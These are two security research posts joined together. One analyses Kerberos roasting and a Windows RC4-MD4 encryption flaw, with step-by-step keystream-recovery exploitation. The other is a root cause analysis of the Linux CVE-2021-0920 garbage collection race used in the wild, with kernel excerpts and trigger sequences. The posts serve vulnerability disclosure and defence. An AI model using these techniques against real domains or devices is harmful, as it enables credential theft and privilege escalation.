To get appropriate cipher text the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as their preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain-text is known for the ticket data the attacker can try to brute force the key from that.
This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also modern versions of Windows Server will try to block this attack by forcing the use of AES keys which are derived from the service user's password over RC4 even if the attacker only requested RC4 support.
An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.
Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack.
However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.
The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.
Windows Kerberos Encryption Implementation
While working on researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG at least for Kerberos is to protect the user's keys, specifically the ones derived from their password and session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm I hoped to be able to extract the original key removing CG's protection.
The encryption algorithms are all implemented inside the CRYPTDLL.DLL library which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented but it's fairly easy to work out how to call the exported functions. For example, to get a "crypto system" from the encryption type integer you can use the following exported function:
The KERB_ECRYPT structure contains configuration information for the engine such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what algorithm is supposed to be, which lead to the following supported systems:
Name Encryption Type
---- ---------------
RSADSI RC4-HMAC 24
RSADSI RC4-HMAC 23
Kerberos AES256-CTS-HMAC-SHA1-96 18
Kerberos AES128-CTS-HMAC-SHA1-96 17
Kerberos DES-CBC-MD5 3
Kerberos DES-CBC-CRC 1
RSADSI RC4-MD4 -128
Kerberos DES-Plain -132
RSADSI RC4-HMAC -133
RSADSI RC4 -134
RSADSI RC4-HMAC -135
RSADSI RC4-EXP -136
RSADSI RC4 -140
RSADSI RC4-EXP -141
Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN -148
Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN -149
Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers.
However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:
Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.
The key is used as-is, there's no blinding so the key stream is always the same for the same user key.
The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.
The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.
Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.
To say this is bad from a cryptographic standpoint, is an understatement. Fortunately it would be safe to assume that while this crypto system is implemented in CRYPTDLL, it wouldn't be used by Kerberos? Unfortunately not — it is totally accepted as a valid encryption type when sent in the AS-REQ to the KDC. The question then becomes how to exploit this behavior?
Exploitation on the Wire (CVE-2022-33647)
My first thoughts were to attack the session key generation. If we could get the server to return the AS-REP with a RC4-MD4 session key for the TGT then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT which is sent in the clear and the session key and make requests as that authenticated user.
The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.
Brute forcing the 40 bit key would be technically feasible at least if you built a giant lookup table, however I felt like it's not practical. I realized there's a simpler way, when a client authenticates it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code.
As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.
When the KDC received the timestamp it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm the key stream used for the timestamp must be the same as used in the response to encrypt the session key. Therefore we could mount a known-plaintext attack to recover the keystream from the timestamp and use that to decrypt parts of the response.
The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.
PA-ENC-TS-ENC ::= SEQUENCE {
patimestamp [0] KerberosTime -- client's time --,
pausec [1] Microseconds OPTIONAL
}
The AS-REP encrypted response has the following ASN.1 structure:
EncASRepPart ::= SEQUENCE {
key [0] EncryptionKey,
last-req [1] LastReq,
nonce [2] UInt32,
key-expiration [3] KerberosTime OPTIONAL,
flags [4] TicketFlags,
authtime [5] KerberosTime,
starttime [6] KerberosTime OPTIONAL,
endtime [7] KerberosTime,
renew-till [8] KerberosTime OPTIONAL,
srealm [9] Realm,
sname [10] PrincipalName,
caddr [11] HostAddresses OPTIONAL
}
We can see from the two structures that as luck would have it the session key in the AS-REP is at the start of the encrypted data. This means there should be an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt the session key without any brute force needed.
The diagram shows the ASN.1 DER structures for the timestamp and the start of the AS-REP. The values with specific hex digits in green are plain-text we know or can calculate as they are part of the ASN.1 structure such as types and lengths. We can see that there's a clear overlap between 4 bytes of known data in the timestamp with the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, but this does mean we need to brute force the final key byte.
We can do this brute force one of two ways. First we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively we can capture a service ticket request from the client which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key we can perform the brute force attack locally without needing to talk to the KDC which will be faster. Regardless of the option chosen this approach would be orders of magnitude faster than brute forcing the entire 40 bit session key.
The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. However, I've not verified that approach.
Exploitation without Interception (CVE-2022-33679)
The requirement to have access to the client to server authentication traffic does make this vulnerability seem less impactful. Although there's plenty of scenarios where an attacker could interpose, such as shared wifi networks, or physical attacks which could be used to compromise the computer account authentication which would take place when a domain joined system was booted.
It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption and the KDC will send back the AS-REP encrypted using that algorithm.
The key to the exploit is to reverse the previous attack, instead of using the timestamp to decrypt the AS-REP we'll use the AS-REP to encrypt a timestamp. We can then use the timestamp value when sent to the KDC as an encryption oracle to brute force enough bytes of the key stream to decrypt the TGT's session key. For example, if we remove the optional microseconds component of the timestamp we get the following DER encoded values:
The diagram shows that currently there's no overlap between the timestamp, represented by the T bytes, and the 40 bit session key. However, we know or at least can calculate the entire DER encoded data for the AS-REP to cover the entire timestamp buffer. We can use this to calculate the keystream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC.
If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses this string to a format suitable for processing by the server. The parser takes the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing. Therefore we can change the timestamp to the following:
We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.
At this point we've got a problem, we can't just add another NUL character as the parser would stop on the first one we sent. Even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is when a second trick comes into play, instead of extending the string we can abuse the way value lengths are encoded in DER. A length can be in one of two forms, a short form if the length is less than 128, or a long form for everything else.
For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1, and the lower 7 bits encode the number of trailing bytes of the length value in big-endian format. For example in the above diagram the timestamp's total size is 0x14 bytes which is stored in the short form. We can instead encode the length in an arbitrary sized long form, for example 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. The examples shown below move the NUL character to brute force the next two bytes of the session key:
Even though technically DER should expect the shortest form necessary to encode the length the Microsoft ASN.1 library doesn't enforce that when parsing so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time the maximum number of requests that we'd need to send to the KDC is 5 × 28 which is 1280 requests as opposed to 240 requests which would be around 1 trillion.
Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. Although it would be very noisy on the network and you'd expect any competent EDR system to notice, it might be too late at that point.
The Fixes
The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which by default disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type of -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication on how long this vulnerability has existed as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.
It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended, however that can bring its own problems. If this particular vulnerability was being exploited in the wild it should be pretty easy to detect. Also unusual Kerberos encryption types would be an immediate red-flag as well as the repeated login attempts.
Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However it's not a panacea, for example for FAST to work the domain joined computer needs to first authenticate without FAST to get a key they can then use for protecting the communications. If that initial authentication is compromised the entire protection fails.
Guest Post by Xingyu Jin, Android Security Research
This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.
Overview of in-the-wild CVE-2021-0920 exploits
A surveillance vendor named Wintego has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.
Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.
This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.
Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android deviceswere also vulnerable, but we did not find any exploit samples against them.
Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.
Introduction
CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.
What is SCM_RIGHTS?
Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this “queued” state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.
Sending
As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.
struct scm_fp_list {
short count;
short max;
struct user_struct *user;
struct file *fp[SCM_MAX_FD];
};
unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by thescm_cookie structure on the stack.
struct scm_cookie {
struct pid *pid;/* Skb credentials */
struct scm_fp_list *fp;/* Passed files */
struct scm_creds creds;/* Skb credentials */
#ifdef CONFIG_SECURITY_NETWORK
u32 secid;/* Passed security ID */
#endif
};
To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.
Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):
…
/*
* Need to duplicate file references for the sake of garbage
* collection. Otherwise a socket in the fps might become a
* candidate for GC while the skb is not yet queued.
*/
UNIXCB(skb).fp = scm_fp_dup(scm->fp);
if(!UNIXCB(skb).fp)
return-ENOMEM;
…
The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:
Let’s examine a concrete example. Assume we have sockets A and B. The A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to the B’s sk_receive_queue which stores received datagrams:
sk_buff carries scm_fp_list structure
The reference count of A is incremented to 2 and the reference count of B is still 1.
Receiving
Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:
/* Mark read part of skb as used */
if(!(flags & MSG_PEEK)){
UNIXCB(skb).consumed += chunk;
sk_peek_offset_bwd(sk, chunk);
if(UNIXCB(skb).fp)
unix_detach_fds(&scm, skb);
if(unix_skb_len(skb))
break;
skb_unlink(skb,&sk->sk_receive_queue);
consume_skb(skb);
if(scm.fp)
break;
The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp)and installs the new file descriptors accordingly for the receiver:
for(i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;
* All of the files that fit in the message have had their
* usage counts incremented, so we just free the list.
*/
__scm_destroy(scm);
Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:
void __scm_destroy(struct scm_cookie *scm)
{
struct scm_fp_list *fpl = scm->fp;
int i;
if(fpl){
scm->fp = NULL;
for(i=fpl->count-1; i>=0; i--)
fput(fpl->fp[i]);
free_uid(fpl->user);
kfree(fpl);
}
}
Reference Counting and Inflight Counting
As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.
Let’s consider the following scenario:
The process creates sockets A and B.
A sends socket A to socket B.
B sends socket B to socket A.
Close A.
Close B.
Scenario for reference count cycle
Both sockets are closed prior to accepting the passed file descriptors.The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.
When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernelincrements unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:
Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B:
The inflight count of A is incremented
When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.
Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle:
Breakable cycle before close A and B
After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:
Unbreakable cycle after close A and B
Now, let’s check another example. Assume we have sockets A, B and 𝛼:
A sends socket A to socket B.
B sends socket B to socket A.
B sends socket B to socket 𝛼.
𝛼 sends socket 𝛼 to socket B.
Close A.
Close B.
Breakable cycle for A, Band𝛼
The cycle is breakable, because we can get newly installed file descriptor B’ from the socket file descriptor 𝛼 and newly installed file descriptor A' from B’.
Garbage Collection
A high level view of garbage collection is available from lwn.net:
"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.
At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."
To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:
Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left.
Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidateslist (garbage.c#L242):
Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):
/* Now remove all internal in-flight reference to children of
* the candidates.
*/
list_for_each_entry(u,&gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);
After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.
To do this, the kernel will put the candidate to not_cycle_list instead and iterates through its receiver queue of each transmitted file in the gc_candidateslist (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:
/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor,&gc_candidates);
while(cursor.next!=&gc_candidates){
u = list_entry(cursor.next,struct unix_sock, link);
Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).
/* Now gc_candidates contains only garbage. Restore original
* inflight counters for these as well, and remove the skbuffs
* which are creating the cycle(s).
*/
skb_queue_head_init(&hitlist);
list_for_each_entry(u,&gc_candidates, link)
scan_children(&u->sk, inc_inflight,&hitlist);
/* not_cycle_list contains those sockets which do not make up a
* cycle. Restore these to the inflight list.
*/
while(!list_empty(¬_cycle_list)){
u = list_entry(not_cycle_list.next,struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATE,&u->gc_flags);
list_move_tail(&u->link,&gc_inflight_list);
}
spin_unlock(&unix_gc_lock);
/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist);
spin_lock(&unix_gc_lock);
__skb_queue_purge clears every skb from the receiver queue:
/**
* __skb_queue_purge - empty a list
* @list: list to empty
*
* Delete all buffers on an &sk_buff list. Each buffer is removed from
* the list and one reference dropped. This function does not take the
* list lock and the caller must hold the relevant locks to use it.
There are two ways to trigger the garbage collection process:
wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.
Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.
Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:
Socket f 00 sends socket f 00to socket f 01.
Socket f 01 sends socket f 01 to socket 𝛼.
Close f 00.
Close f 01.
Before starting the garbage collection process, the status of socket file descriptors are:
f 00: ref = 1, inflight = 1
f 01: ref = 1, inflight = 1
𝛼: ref = 1, inflight = 0
Breakable cycle by f 00, f 01 and 𝛼
During the garbage collection process, f 00and f 01are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.
CVE-2021-0920 Root Cause Analysis
When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.
recvmsg without MSG_PEEK flag
The kernel functionunix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. Then, the function unix_stream_read_generic calls unix_detach_fds to decrement the inflight count. Then, unix_detach_fds clears the list of passed file descriptors (scm_fp_list) from the skb:
Later skb_unlink and consume_skb are invoked from unix_stream_read_generic(af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:
staticvoid unix_destruct_scm(struct sk_buff *skb)
{
struct scm_cookie scm;
memset(&scm,0,sizeof(scm));
scm.pid = UNIXCB(skb).pid;
if(UNIXCB(skb).fp)
unix_detach_fds(&scm, skb);
/* Alas, it calls VFS */
/* So fscking what? fput() had been SMP-safe since the last Summer */
scm_destroy(&scm);
sock_wfree(skb);
}
In fact, the unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked for installing a new file descriptor.
recvmsg with MSG_PEEK flag
The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):
/* It is questionable, see note in unix_dgram_recvmsg.
*/
if(UNIXCB(skb).fp)
scm.fp = scm_fp_dup(UNIXCB(skb).fp);
sk_peek_offset_fwd(sk, chunk);
if(UNIXCB(skb).fp)
break;
Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.
recvmsg Examples
Let’s see a concrete example. Assume there are the following socket pairs:
f 00, f 01
f 10, f 11
Now, the program does the following operations:
f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
f 10 → [f 00] → f 11
Close(f 00)
Breakable cycle by f 00, f 01, f 10andf 11
Here is the status:
inflight(f 00) = 2, ref(f 00) = 2
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.
If f 01 then calls recvmsgwithMSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:
MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared
Status:
inflight(f 00) = 2, ref(f 00) = 3
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
Then, f 01 calls recvmsgwithoutMSG_PEEK flag, f 01’s receive queue is removed. f 01 also fetches a new file descriptor f 00'':
The receive queue of f 01 is cleared and f 01'' is obtained from f 01
Status:
inflight(f 00) = 1, ref(f 00) = 3
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
UAF Scenario
From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.
Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼:
f 00, f 01
f 10, f 11
f 20, f 21
f 30, f 31
sock 𝛼 (actually there might be even thousands of 𝛼 for protracting the garbage collection process in order to evade a BUG_ON check which will be introduced later).
Now, the program does the below operations:
Close the following file descriptors prior to any recvmsg calls:
Close(f 00)
Close(f 01)
Close(f 11)
Close(f 10)
Close(f 30)
Close(f 31)
Close(𝛼)
Here is the status:
inflight(f 00) = N + 1, ref(f 00) = N + 1
inflight(f 01) = 2, ref(f 01) = 2
inflight(f 10) = 3, ref(f 10) = 3
inflight(f 11) = 1, ref(f 11) = 1
inflight(f 20) = 0, ref(f 20) = 1
inflight(f 21) = 0, ref(f 21) = 1
inflight(f 31) = 1, ref(f 31) = 1
inflight(𝛼) = 1, ref(𝛼) = 1
If the garbage collection process happens now, the kernel will do the following scrutiny:
List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
Since f 21 is not considered a candidate, f 11’s inflight count is still above zero.
Recursively restore the inflight count.
Nothing is considered garbage.
A potential skb UAF by race condition can be triggered by:
Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.
Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.
Concurrently do the following operations:
Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.
Call recvmsg with MSG_PEEK flag from f 10’
How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:
Thread 0
Thread 1
Thread 2
Call unix_gc
Stage0: List f 00, f 01, f 10, f 11, f 31, 𝛼as garbage candidates.
Call recvmsg with MSG_PEEK flag from f 21 to get f 11’
Stage0: decrease inflight count from the child of every garbage candidates
Status after stage 0:
inflight(f 00) = 0
inflight(f 01) = 0
inflight(f 10) = 0
inflight(f 11) = 1
inflight(f 31) = 0
inflight(𝛼) = 0
Stage1: Start restoring inflight count.
Call recvmsg with MSG_PEEK flag from f 11 to get f 10’
Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’
unix_detach_fds: UNIXCB(skb).fp = NULL
Blocked by spin_lock(&unix_gc_lock)
Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.
Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage.
Stage2: start purging garbage.
Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00'
